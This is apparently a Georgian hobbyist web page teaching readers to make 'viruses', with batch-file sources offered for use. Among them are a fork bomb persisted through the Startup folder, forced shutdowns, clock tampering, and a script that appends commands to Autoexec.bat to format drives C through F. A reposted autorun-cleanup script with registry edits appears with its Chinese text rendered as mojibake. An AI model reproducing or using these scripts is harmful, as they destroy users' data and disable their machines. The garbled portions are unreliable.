rogor SevqmnaT virusebi? aq me gaswavliT Tu rogor unda SevqmnaT virusebi, sxvadasxva tipis da sxvadasxva daniSnulebis. modi daviwyoT. pirvel viruss romelsac me exla agixsniT akeTebs monitoris gaTiSvas ise rom monitoris qvemod naTura anaTebs da ramdenic ar unda daaWiroT monitoris Rilaks, mainc verafers dainaxavT: verc Desktop-s verc verafers. am virusis gasakeTeblad me damWirda: vizualurad ori fanjris Seqmna, romelic aris Savi feris anu roca fails gaxsniT is gadaekvreba monitors da monitorze araferi Cans. roca windows->D klaviSebs vaWerT erTmaneTis miyolebiT iciT rom eg xuravs yvela fanjaras imisaTvis rom gamoaCinos Desktop-i, magram maT daWeris Semdeg pirveli Savi fanjara ki ixureba magram ixsneba meore Savi fanjara romelic saSualebas ar iZleva rom desktopi gamoaCinos. amasTan erTad me gavaqre e. w. Taskbar-i radgan programis muSaobis srulyofis mizniT es saWiroebas moiTxovda, mis gasaqrobad me damWirda gamego Taskbar-is klasi, romelic aris: Shell_TrayWnd. amas garda me damWirda rom gameqro kursori radgan es viruss ufro met efeqts SesZenda. uaryofiTi mxare: virusi SegiZliaT gamorToT Task Manager-iT. Semdegi virusia skaipis virusi. misi daniSnulebaa rom skaips Seucvalos fanjris saxeli da skaipis fanjaras adgili ecvlebodes. am virusis Sesaqmnelad Cven dagvWirdeba rom gavigoT skaipis klasi da es klasia: TApplication. saerTod roca gvinda rom rame programasTan kavSiri davamyaroT maSin unda gavigoT am programis klasi. rac Seexeba fanjris adgilis cvlas, me SemoviRe cikli da drois elementi, anu me aviRe 3 wami, da am 3 wamSi fanjaram unda Seicvalos adgili. uaryofiTi mxare: virusi SegiZliaT gamorToT Task Manager-is procesidan. Cveni Semdegi virusi akeTebs kursoris adgilis cvlas. am virusis Sesaqmnelad me damWirda gamego kursoris koordinatebi, amis garda gamoviyene drois elementi anu ama da am dros kursors Seecvala adglmdebareoba, Semdeg es yvelaferi Cavsvi ciklSi. am virusis CarTvis Semdeg kusori ise swrafad icvlis adgils rom Tqven arafris gakeTeba ar SegiZliaT. აი ვირუსების სოურსები:download ვირუსები რომლებიც აქ არის დაწერილი უნდა იყოს გაკეთებული text document-ში და შემდეგ ჩასახრანებული(save as) .bat ფაილად ეს ვირუსი ბევრ პაპკებს ქმნის cls md c:\aa cls md c:\aa2 cls md c:\aa3 cls md c:\aa4 cls md c:\aa5 cls md c:\aa6 cls md c:\aa8 cls md c:\aa9 cls md c:\aa10 cls md c:\aa11 cls md c:\aa12 cls md c:\aa13 cls md c:\aa14 cls md c:\aa15 cls md c:\aa16 cls md c:\aa17 cls ეს ვირუსი საათს რევს @ECHO OFF cls time 04:04 cls cls date 12/12/2220 cls აქ არის მოყვანილი ვირუსის შესაქმნელად საჭირო dos-ის ბრძანებები taskkill /f /im explorer.exe(process tishavs) shutdown -r -t 60(arestartebs 60 camshi) shutdown -l LOG OF(log off-s uketebs) format /y /q d: (aformatebs anu shlis D:\ -s ) copy c:\visualhack\1.txt d:\visualhack\ (kopireba cmd-it) md c:\aa (aa papkis shekmna) ეს ვირუსი დაგიფორმატებთ ყველა დისკს და რესტარტს გაუკეთებს კომპს echo format /y /q d: >> c:\Autoexec.bat echo format /y /q e: >> c:\Autoexec.bat echo format /y /q f: >> c:\Autoexec.bat echo format /y /q c: >> c:\Autoexec.bat restart -r -c ვირუსი სახელად: cd rom cls Echo Set oWMP = CreateObject("WMPlayer.OCX.7") >m.vbs Echo Set colCDROMs = oWMP.cdromCollection >>m.vbs Echo colCDROMs.Item(i).Eject >>m.vbs Start M.vbs cls ვირუსი სახელად: kill :metka @start kill.bat @echo -----www.lashatt.ucoz.com----- @goto metka ვირუსი სახელად: kill1 :metka @start kill2.bat @echo -----www.lashatt.ucoz.com----- @goto metka cls copy kill2.bat C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup cls ეს ვირუსი გამორთავს კომპს 60 წამში და გამოიტანს ტექსტს shutdown -s -t 60 -c "lashatt.ucoz.com" ვირუსი სახელად: Autorun deleter @echo off cls echo. echo *********** Delete Autorun batch file *********** echo. echo. echo ¦¹ÀÉ®×°£¤F¦³§R°£Autorun.inf¨ÃÃö³¬Autorun¥\¯à¥~ echo ¥t¥~¦³§R°£MountPoints2¤º²§±`¾÷½Xªº¥\¯à echo. echo ============================================== echo. echo. echo ¦¹§å¦¸ÀÉ°õ¦æ«á·|Ãö³¬Autorun¥\¯à echo. echo ¦pªGn¦^´_Autorun¥\¯à«h½Ð±NÀɮשñ¸m¦bc:\«á echo. echo «ö¶}©l -^> °õ¦æ -^> ¿é¤Jc:\delautorun open«á«ö½T©w echo. echo ¨Ì·Ó°Ê§@«ü¥Ü¶]§¹«á§Y¥i¦^´_Autorun¥\¯à echo. echo. echo ¦p¤£·Q°õ¦æ½Ð«öCTRL+C«á«öY¸õ¥X©Îª½±µ±Nµøµ¡Ãö³¬¡C echo. pause cls if not "%1"=="open" goto st echo. echo ¦^´_Autorun¥\¯à¨Ã§R°£Autorun.inf¸ê®Æ§¨ for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( attrib -r -s -h +a /D /S %%a:\autorun.inf >nul 2>nul rd %%a:\autorun.inf >nul 2>nul&&echo.&&echo ²¾°£%%a:\Autorun.inf¸ê®Æ§¨ ) echo. echo. reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveAutoRun" /f >nul 2>nul reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul reg.exe add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x00000091 /f >nul 2>nul echo ³B²z§¹²¦½Ð«·s¶}¾÷ echo. pause exit :st if not exist c:\delauto goto delauto if exist c:\delauto\usbmons.dll attrib -r -s -h -a %windir%\system32\usbmons.dll&del %windir%\system32\usbmons.dll >nul 2>nul&del c:\delauto\usbmons.dll >nul 2>nul echo. echo ²M²z«e¦¸°õ¦æ¦¹§å¦¸ÀɼȦsÀÉ©Mautorun.inf¸ê®Æ§¨ echo. for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( attrib -r -s -h +a /D /S %%a:\autorun.inf >nul 2>nul rd %%a:\autorun.inf >nul 2>nul ) del c:\delauto\*.* /s /q >nul 2>nul rd c:\delauto /s /q :delauto md c:\delauto copy %windir%\regedit.exe c:\delauto\fixreg.exe >nul 2>nul if not exist %windir%\system32\usbmons.dll goto disable @echo Windows Registry Editor Version 5.00 >c:\delauto\fix.reg @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg @echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg @echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg @echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg @echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\USB Monitor] >>c:\delauto\fix.reg @echo "Driver"="usbmon.dll" >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\usbmon >>c:\delauto\fix.reg c:\delauto\fixreg.exe /s c:\delauto\fix.reg attrib -r -s -h -a %windir%\system32\usbmons.dll >nul 2>nul copy %windir%\system32\usbmons.dll c:\delauto\ >nul 2>nul echo ½Ð©ó«·s¶}¾÷«á¦A°õ¦æ¤@¦¸¦¹µ{¦¡ echo. pause cls :disable echo. echo ×´_ºÏºÐÂI¤£¶}©MÃö³¬autorun¥\¯à reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveAutoRun /t REG_BINARY /d ffffff03 /f >nul 2>nul reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul reg.exe add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 0x000000Ff /f >nul 2>nul reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2" /f >nul 2>nul for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( if exist %%a:\autorun.inf echo.&echo §R°£%%a:\Autorun.inf attrib -r -s -h -a %%a:\autorun.inf >nul 2>nul&del %%a:\autorun.inf /f /q >nul 2>nul md %%a:\autorun.inf >nul 2>nul&&echo.&&echo ³Ð«Ø%%a:\Autorun.inf¸ê®Æ§¨&&attrib +r +s +h +a %%a:\autorun.inf >nul 2>nul&&echo. >>c:\delauto\autorun.txt&&fsutil fsinfo drivetype %%a: >>c:\delauto\autorun.txt&&dir/a %%a:\|find /i "autorun.inf" >> c:\delauto\autorun.txt ) echo. echo §R°£¸ê·½¦^¦¬±í¤º°õ¦æÀÉ for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( for %%b in (EXE COM PIF) do ( attrib -r -s -h -a %%a:\RECYCLER\*.%%b /s >nul 2>nul&attrib -r -s -h -a %%a:\RECYCLED\*.%%b /s >nul 2>nul del %%a:\recycler\*.%%b /s /q /f >nul 2>nul&del %%a:\recycled\*.%%b /s /q /f >nul 2>nul )) @echo Windows Registry Editor Version 5.00 >c:\delauto\fix.reg @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >>c:\delauto\fix.reg @echo "CheckedValue"=dword:00000001 >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EGHOST.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.com] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NOD32.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.com] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.EXE] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp] >>c:\delauto\fix.reg @echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe] >>c:\delauto\fix.reg c:\delauto\fixreg.exe /s c:\delauto\fix.reg :last copy %windir%\regedit.exe c:\delauto\fixreg.exe >nul 2>nul c:\delauto\fixreg.exe /s c:\delauto\fix.reg attrib -r -s -h -a c:\found.??? /S /D >nul 2>nul del c:\found.???\*.* /s /q /f >nul 2>nul rd c:\found.??? >nul 2>nul echo. echo ³B²z§¹²¦&pause cls echo. echo ¥H¤U·|Åã¥Ü¦UºÏºÐ¤ºAutorun.inf¬O§_¬°¸ê®Æ§¨ echo ¦pªG¬O¦¹§å¦¸Àɫإߤ§¸ê®Æ§¨«h·|Åã¥ÜÃþ¦ü¹³¤U¦C¤å¦r echo. echo C: - ©T©w¦¡ºÏºÐ echo %date% %time% ^<DIR^> autorun.inf echo. echo ¦pªG¨S¦³Åã¥Ü^<DIR^>³oÓ´XÓ¤å¦r«hªí¥ÜAutorun.inf§R°£¥¢±Ñ½ÐÀˬd¹q¸£¤º¨ä¥L¦a¤è¬O§_§t¦³¯f¬r echo ¥t¥~¦pªG¬O¥úºÐ¾÷¤ºªºÀɮ׫h½Ð©¿²¤.... echo. pause echo. type c:\delauto\autorun.txt|more echo. echo °õ¦æ§¹²¦½Ð«·s¶}¾÷¡C echo. pause exit ვირუსი რომელიც ბევრ dos ფანჯრებს ყრის(ანტივირუსი:taskkill /f /im cmd.exe) start filename.bat ეს არის memory-ს ვირუსი @ECHO OFF REM <<< code: jmp installation, int_21 handler part 1 >>> copy %0 b.com>nul b.com del b.com rem <<< code: TSR installation, int_21 handler part 2 >>>
Pages: 1
0 -0 of 0
messages displayed
News calendar
« April 2024 » Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30